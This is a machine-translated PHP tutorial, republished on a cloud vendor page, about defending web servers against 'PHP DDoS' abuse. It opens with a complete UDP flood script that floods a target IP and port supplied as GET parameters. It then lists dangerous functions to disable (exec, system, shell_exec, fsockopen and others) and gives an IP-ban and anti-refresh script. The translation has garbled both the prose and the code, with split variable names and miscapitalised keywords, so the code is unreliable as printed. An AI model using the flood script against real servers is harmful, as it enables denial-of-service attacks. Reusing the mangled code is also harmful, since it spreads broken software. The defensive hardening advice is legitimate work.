PHP DDoS Several defense methods detailed _php Tutorial

Source: Internet
Author: User
PHP DDoS is a use of the server is the use of my server php.ini configuration Allow_url_fopen = on to become, but allow_url_fopen this feature a lot of sites need to use, let me introduce you some about PHP Several defensive methods of DDoS

Let's start by looking at the PHP DDoS code

The code is as follows Copy Code

$packets = 0;
$ip = $_get[' IP '];
$rand = $_get[' Port '];
Set_time_limit (0);
Ignore_user_abort (FALSE);
$exec _time = $_get[' time ');
$time = time ();
Print "flooded: $ip on port $rand
";
$max _time = $time + $exec _time;

for ($i =0; $i <65535; $i + +) {
$out. = "X";
}
while (1) {
$packets + +;
if (Time () > $max _time) {
Break
}
$fp = Fsockopen ("udp://$ip", $rand, $errno, $ERRSTR, 5);
if ($fp) {
Fwrite ($fp, $out);
Fclose ($FP);
}
}
echo "Packet". Time (' h:i:s '). "With $packets (". Round (($packets *65)/1024, 2). "MB) packets averaging". Round ($packets/$exec _time, 2). "PACKETS/S n";
?>

Attentive friends will find that Fsockopen is a major attack function, and constantly connect sending requests resulting in excessive machine traffic and CPU so that the site is not properly accessed.

So a simple study of the PHP DDoS script construction, and some gain, here are a few ways to avoid the most:

Note: The following operations are dangerous, regardless of the consequences of the tour, please be careful to operate.

1. Open php.ini

2. Disabling dangerous functions

Because of the different programs, the function requirements are different, so ask the customer to delete the functions that need to be disabled.

Find the Disable_functions, will the front ";" To remove, add after the equal sign:

The code is as follows Copy Code

Phpinfo,passthru,exec,system,popen,chroot,escapeshellcmd,escapeshellarg,shell_exec,proc_open,
Proc_get_status,fsocket,fsockopen

3. Set PHP Execution time-out

If the program does not end but has reached the maximum execution time, it will be forced to stop, adjust the time as necessary.

Find the Max_execution_time, will the front ";" Remove, add a positive integer after the equal sign, in seconds, for example: 30

4. Disable upload directory PHP execute permissions

Roughly divided into three kinds of servers: Iis,apache, Nginx, the specific steps will not write, release a link for your reference:

IIS and Apache Cancel Directory Script Execution permissions method: Http://www.bKjia.c0m/sys/Windows/46232.htm

5. A very violent method

Directly prohibit PHP execution, because many sites can generate static Web pages, each generation or management to manually open PHP execution permissions, now there are several users to use this method, the specific method is described in Method 4

6. Close the User Center

such as Dede and other CMS will have User Center, there are many places to upload, this is the general problem.

7. Modify the Administrator directory

This method is not discussed in detail, it is not suitable for all programs.

8. Modify the default Admin account

Many people are accustomed to use: admin but if the program has a vulnerability, it is easy to guess the password of the admin, so it is recommended to modify the admin for other logins.

9. A complex and remembered password

Whether it is a windows/linux system user or the webmaster's account, you need to set a hard-to-guess password, such as: 123hai@tang@.

And then attach a PHP anti-DDoS attack code

The code is as follows Copy Code

Query prohibit IP
$ip =$_server[' remote_addr '];
$fileht = ". Htaccess2";
if (!file_exists ($fileht)) file_put_contents ($fileht, "");
$filehtarr = @file ($fileht);
if (In_array ($ip. " RN ", $filehtarr)" Die ("Warning:". ")
"." Your IP address is forbided by some reason and IF you had any question Pls Emill to shop@mydalle.com! ");

Add Forbidden IP
$time =time ();
$fileforbid = "Log/forbidchk.dat";
if (file_exists ($fileforbid))
{if ($time-filemtime ($fileforbid) >60) unlink ($fileforbid);
else{
$fileforbidarr = @file ($fileforbid);
if ($ip ==substr ($fileforbidarr [0],0,strlen ($IP)))
{
if ($time-substr ($fileforbidarr [1],0,strlen ($time)) >600) unlink ($fileforbid);
ElseIf ($fileforbidarr [2]>600) {file_put_contents ($fileht, $ip. " RN ", file_append); unlink ($fileforbid);}
else{$fileforbidarr [2]++;file_put_contents ($fileforbid, $fileforbidarr);}
}
}
}
Anti-Refresh
$str = "";
$file = "Log/ipdate.dat";
if (!file_exists ("Log") &&!is_dir ("Log")) mkdir ("Log", 0777);
if (!file_exists ($file)) file_put_contents ($file, "");
$allowTime = 120;//anti-refresh Time
$allowNum =10;//anti-refresh times
$uri =$_server[' Request_uri '];
$checkip =md5 ($IP);
$checkuri =md5 ($uri);
$yesno =true;
$ipdate = @file ($file);
foreach ($ipdate as $k = $v)
{$iptem =substr ($v, 0,32);
$uritem =substr ($v, 32,32);
$timetem =substr ($v, 64,10);
$numtem =substr ($v, 74);
if ($time-$timetem < $allowTime) {
if ($iptem! = $checkip) $str. = $v;
else{
$yesno =false;
if ($uritem! = $checkuri) $str. = $iptem. $checkuri. $time. " 1rn ";
ElseIf ($numtem < $allowNum) $str. = $iptem. $uritem. $timetem. ($numtem + 1). " RN ";
Else
{
if (!file_exists ($fileforbid)) {$addforbidarr =array ($ip. ") RN ", Time ()." RN ", 1); File_put_contents ($fileforbid, $addforbidarr);}
File_put_contents ("Log/forbided_ip.log", $ip. " --". Date (" Y-m-d h:i:s ", Time ())." --". $uri." RN ", file_append);
$timepass = $timetem + $allowTime-$time;
Die ("Warning:". ")
"." Sorry,you is forbided by refreshing frequently too much, Pls wait for ". $timepass." Seconds to continue! ");
}
}
}
}
if ($yesno) $str. = $checkip. $checkuri. $time. " 1rn ";
File_put_contents ($file, $STR);
?>


Related tutorials:

IIS prevents PHP DDoS from covering network bandwidth and server resource resolution

http://www.bkjia.com/PHPjc/632837.html www.bkjia.com true http://www.bkjia.com/PHPjc/632837.html techarticle PHP DDoS is a use of the server is the use of my server php.ini configuration Allow_url_fopen = on to become, but allow_url_fopen this feature many sites need to use, below I come ...

  • Contact Us

    The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

    If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

    A Free Trial That Lets You Build Big!

    Start building with 50+ products and up to 12 months usage for Elastic Compute Service

    • Sales Support

      1 on 1 presale consultation

    • After-Sales Support

      24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.